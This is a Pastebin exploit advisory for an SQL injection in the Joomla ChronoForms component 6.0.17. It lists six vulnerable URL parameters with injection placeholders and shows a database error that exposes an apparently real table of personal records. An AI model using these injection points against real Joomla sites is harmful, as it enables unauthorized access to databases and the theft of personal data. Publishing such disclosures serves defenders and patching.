KingSkrupellos

Joomla ChronoForms Components 6.0.17 SQL Injection

Feb 25th, 2019
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.03 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla ChronoForms Components 6.0.17 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 26/02/2019
  7. # Vendor Homepage : chronoengine.com
  8. # Software Download Link : chronoengine.com/chronoforms
  9. # Software Information Link : extensions.joomla.org/extension/chronoforms/
  10. # Software Affected Version : 6.0.17 and all previous versions
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  15. Special Elements used in an SQL Command ('SQL Injection') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ####################################################################
  21.  
  22. # Description about Software :
  23. ***************************
  24. Chronoforms is the best Joomla form builder, build any kind of Joomla forms with ease.
  25.  
  26. Your creative Joomla forms maker, build a responsive contact form in seconds with bootstrap
  27.  
  28. CSS, with this easy to use Joomla forms builder every kind of form is possible, contact forms,
  29.  
  30. payment forms, autoresponders, article form, survey, captcha, multi page and more!
  31.  
  32. ####################################################################
  33.  
  34. # Impact :
  35. ***********
  36. Joomla ChronoForms Components 6.0.17 [ and other versions ] component
  37.  
  38. for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
  39.  
  40. user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker
  41.  
  42. to compromise the application, access or modify data, or exploit latent vulnerabilities
  43.  
  44. in the underlying database. A remote attacker can send a specially crafted request
  45.  
  46. to the vulnerable application and execute arbitrary SQL commands in application`s database.
  47.  
  48. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  49.  
  50. An attacker can exploit this issue using a browser.
  51.  
  52. ####################################################################
  53.  
  54. # SQL Injection Exploit :
  55. **********************
  56. /index.php?option=com_chronoforms&chronoform=stampaPdf&id=[SQL Injection]
  57.  
  58. /index.php?option=com_chronoforms&view=form&Itemid=[SQL Injection]
  59.  
  60. /index.php?option=com_chronoforms&view=form&Itemid=[SQL Injection]&lang=en
  61.  
  62. /index.php?option=com_chronoforms&chronoform=[SQL Injection]&lang=en
  63.  
  64. /index.php?option=com_chronoforms&chronoform=grafiekjes&product=[SQL Injection]
  65.  
  66. /index.php?Itemid=[ID-NUMBER]&option=com_chronoforms&view=form&pid=[SQL Injection]
  67.  
  68. ####################################################################
  69.  
  70. # Example SQL Database Error :
  71. ****************************
  72. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your
  73. MySQL server version for the right syntax to use near '' at line 4 SQL=SELECT
  74. idGestioneUtenti,nomeTitolare,cognomeTitolare,ragioneSocialeTitolare,dataNascitaTitolare,
  75. codiceFiscaleTitolare,indirizzoTitolare,capTitolare,idCittaTitolare,telefonoTitolare,
  76. indirizzoUbicazione,capUbicazione,idCittaUbicazione,dataAtto,numAtto,codUtenza,
  77. idTipoUtenza,numPersone,mqSuperfice,codKit,codUmido,idTipologiaCompostiera
  78. ,idZona,idCapienzaVetro,idCapienzaVetro240,idCapienzaVetro360,idCapienzaPlastica
  79. ,idCapienzaPlastica240,idCapienzaPlastica360,idCapienzaIndifferenziato
  80. ,idCapienzaIndifferenziato240,idCapienzaIndifferenziato360,idCapienzaUmido
  81. ,idCapienzaUmido240, idCapienzaUmido360,idCapienzaCarta,idCapienzaCarta240
  82. ,idCapienzaCarta360,idCapienzaOlioVegetale,DatiPersonaRitirante,telefonoRitirante
  83. ,note,numPlastica,numUmido,numCarta,numOlio,numIndif,cessazione
  84. FROM SATEX_gestioneUtenti WHERE idGestioneUtenti=
  85.  
  86. ####################################################################
  87.  
  88. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  89.  
  90. ####################################################################
Add Comment
Please, Sign In to add comment